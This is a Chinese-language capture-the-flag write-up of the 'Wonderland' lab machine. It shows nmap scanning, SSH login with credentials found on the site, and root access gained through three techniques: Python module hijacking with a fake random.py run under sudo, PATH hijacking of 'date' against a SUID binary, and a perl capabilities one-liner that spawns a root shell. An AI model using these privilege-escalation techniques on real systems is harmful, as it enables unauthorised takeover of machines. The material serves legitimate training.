Wonderland

这个首先给了个IP,首先进行nmap扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
┌──(kali㉿kali)-[~/Desktop/WEBTOOL]
└─$ sudo nmap -sV -vv --script vuln 10.10.255.228
[sudo] kali 的密码:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-07-14 03:36 EDT
NSE: Loaded 149 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:36
Completed NSE at 03:37, 10.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:37
Completed NSE at 03:37, 0.00s elapsed
Initiating Ping Scan at 03:37
Scanning 10.10.255.228 [4 ports]
Completed Ping Scan at 03:37, 0.34s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:37
Completed Parallel DNS resolution of 1 host. at 03:37, 0.03s elapsed
Initiating SYN Stealth Scan at 03:37
Scanning 10.10.255.228 [1000 ports]
Discovered open port 80/tcp on 10.10.255.228
Discovered open port 22/tcp on 10.10.255.228
Completed SYN Stealth Scan at 03:37, 4.07s elapsed (1000 total ports)
Initiating Service scan at 03:37
Scanning 2 services on 10.10.255.228
Completed Service scan at 03:37, 13.62s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.255.228.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:37
NSE Timing: About 98.52% done; ETC: 03:37 (0:00:00 remaining)
NSE Timing: About 98.52% done; ETC: 03:38 (0:00:01 remaining)
NSE Timing: About 98.52% done; ETC: 03:38 (0:00:01 remaining)
NSE Timing: About 98.52% done; ETC: 03:39 (0:00:02 remaining)
NSE Timing: About 98.52% done; ETC: 03:39 (0:00:02 remaining)
NSE Timing: About 98.52% done; ETC: 03:40 (0:00:03 remaining)
NSE Timing: About 98.52% done; ETC: 03:40 (0:00:03 remaining)
NSE Timing: About 98.52% done; ETC: 03:41 (0:00:04 remaining)
NSE Timing: About 98.52% done; ETC: 03:41 (0:00:04 remaining)
NSE Timing: About 98.52% done; ETC: 03:42 (0:00:05 remaining)
NSE Timing: About 98.52% done; ETC: 03:42 (0:00:05 remaining)
NSE Timing: About 98.52% done; ETC: 03:43 (0:00:05 remaining)
NSE Timing: About 98.52% done; ETC: 03:43 (0:00:06 remaining)
NSE Timing: About 98.52% done; ETC: 03:44 (0:00:06 remaining)
NSE Timing: About 98.52% done; ETC: 03:44 (0:00:07 remaining)
NSE Timing: About 98.52% done; ETC: 03:45 (0:00:07 remaining)
NSE Timing: About 98.89% done; ETC: 03:45 (0:00:06 remaining)
NSE Timing: About 99.63% done; ETC: 03:46 (0:00:02 remaining)
NSE Timing: About 99.63% done; ETC: 03:46 (0:00:02 remaining)
NSE Timing: About 99.63% done; ETC: 03:47 (0:00:02 remaining)
NSE Timing: About 99.63% done; ETC: 03:47 (0:00:02 remaining)
NSE Timing: About 99.63% done; ETC: 03:48 (0:00:02 remaining)
Completed NSE at 03:48, 661.47s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:48
Completed NSE at 03:48, 1.21s elapsed
Nmap scan report for 10.10.255.228
Host is up, received reset ttl 60 (0.29s latency).
Scanned at 2023-07-14 03:37:02 EDT for 680s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 60 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.6p1:
| EXPLOITPACK:98FE96309F9524B8C84C508837551A19 5.8 https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
| EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 5.8 https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
| EDB-ID:46516 5.8 https://vulners.com/exploitdb/EDB-ID:46516 *EXPLOIT*
| EDB-ID:46193 5.8 https://vulners.com/exploitdb/EDB-ID:46193 *EXPLOIT*
| CVE-2019-6111 5.8 https://vulners.com/cve/CVE-2019-6111
| 1337DAY-ID-32328 5.8 https://vulners.com/zdt/1337DAY-ID-32328 *EXPLOIT*
| 1337DAY-ID-32009 5.8 https://vulners.com/zdt/1337DAY-ID-32009 *EXPLOIT*
| SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT*
| PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT*
| EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT*
| EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT*
| EDB-ID:45939 5.0 https://vulners.com/exploitdb/EDB-ID:45939 *EXPLOIT*
| EDB-ID:45233 5.0 https://vulners.com/exploitdb/EDB-ID:45233 *EXPLOIT*
| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
| CVE-2018-15473 5.0 https://vulners.com/cve/CVE-2018-15473
| 1337DAY-ID-31730 5.0 https://vulners.com/zdt/1337DAY-ID-31730 *EXPLOIT*
| CVE-2021-41617 4.4 https://vulners.com/cve/CVE-2021-41617
| CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145
| CVE-2019-6110 4.0 https://vulners.com/cve/CVE-2019-6110
| CVE-2019-6109 4.0 https://vulners.com/cve/CVE-2019-6109
| CVE-2018-20685 2.6 https://vulners.com/cve/CVE-2018-20685
| PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
| MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- 0.0 https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS- *EXPLOIT*
|_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT*
80/tcp open http syn-ack ttl 60 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-enum:
| /r/: Potentially interesting folder
|_ /img/: Potentially interesting folder
|_http-passwd: ERROR: Script execution failed (use -d to debug)
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 691.65 seconds
Raw packets sent: 1093 (48.068KB) | Rcvd: 1002 (40.088KB)

存在22和80端口开发,并且并没有发现可以利用的漏洞,于是继续扫描80端口的web服务

image-20230714160136386

发现访问对应页面

image-20230714160330484

发现了alice:HowDothTheLittleCrocodileImproveHisShiningTail 推测是ssh登录用户名密码

image-20230714160626485

当前目录存在 root.txt和walus_and_the_carpenter.py

image-20230714160756498

然后直接用find命令查找user.txt,但是找不到,于是查看了hint,hint说

image-20230714161029363

意思是所有的东西颠倒了,alice的用户目录下有root.txt那么对应的root的目录下面应该会有user.txt

image-20230714161147450

事实上也是这样的。

然后是第二步骤,需要提权才能看到root.txt里面的内容。

用户目录下面的python文件内容如下,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"

The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"

"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.

"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."

The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head —
Meaning to say he did not choose
To leave the oyster-bed.

But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat —
And this was odd, because, you know,
They hadn’t any feet.

Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more —
All hopping through the frothy waves,
And scrambling to the shore.

The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.

"The time has come," the Walrus said,
"To talk of many things:
Of shoes — and ships — and sealing-wax —
Of cabbages — and kings —
And why the sea is boiling hot —
And whether pigs have wings."

"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.

"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed —
Now if you’re ready Oysters dear,
We can begin to feed."

"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?

"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf —
I’ve had to ask you twice!"

"It seems a shame," the Walrus said,
"To play them such a trick,
After we’ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter’s spread too thick!"

"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.

"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)

看似并没有什么漏洞,但是可以利用import导入的random,如果在当前目录下面有random.py那么会优先导入当前目录下的random.py所以可以利用这点达到getshell。但是如果只是自己运行当然没有,所以尝试寻找是否存在suid权限或者sudo进行提权。

首先尝试suid进行提权,寻找具有suid权限的

find / -perm -u=s -type f 2>/dev/null

image-20230714161719245

然后看看sudo -l

image-20230714161850974

发现存在python能够用sudo进行执行,所以利用这点写一个random.py即可提权到rabbit用户

1
2
import os
os.system('/bin/bash')

image-20230714162156811

执行以后成功获取了rabbit的shell

进入rabbit用户目录发现了

image-20230714162232892

image-20230714162314858

发现存在suid权限,所以推测是否可以利用这个文件进行提权

image-20230714162400769

仔细分析当中的内容,发现了一个时间,并且每次执行都不一样,推测是否可能调用的是系统命令或者是,于是自己尝试使用date测试,发现跟内容一样,推测使用了date这个命令。

又因为suid执行的时候,权限虽然是提升后的权限,但是环境变量访问的却是当前用户的环境变量, 所以可以利用环境变量,达到自定义执行shell脚本达到提权目的。

操作如下:因为环境变量的执行是会从左往右依次去查找执行的,即例如/tmp:/usr/bin这样的PATH变量,如果tmp里面存在date而**/usr/bin里面也存在date但是会执行tmp**里面的。

所以只需要在/tmp里面写一个date的自定义shell脚本即可。

date内容如下:

1
2
#! /bin/bash
/bin/bash

image-20230714163446157

然后发现提权成功了,到这一步我确实没想到怎么继续了。

suid也尝试过但是没有用。

这一步其实使用Capabilities提权

getcap -r / 2>/dev/null

image-20230714163635207

有一点要注意,我发现如果是通过其他用户提权到hatter这个用户的是没法用Capabilities位进行提权到,这个进程并没有继承到hatter这个用户的Capabilities位权限,只能用ssh或者其他手段进行,然后再hatter用户根目录找到了hatter用户的密码。

1
2
hatter@wonderland:/home/hatter$ cat /home/hatter/password.txt 
WhyIsARavenLikeAWritingDesk?

所以直接用密码进行ssh然后再利用 perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'进行提权

然后就成功拿到了root的shell

image-20230714171051589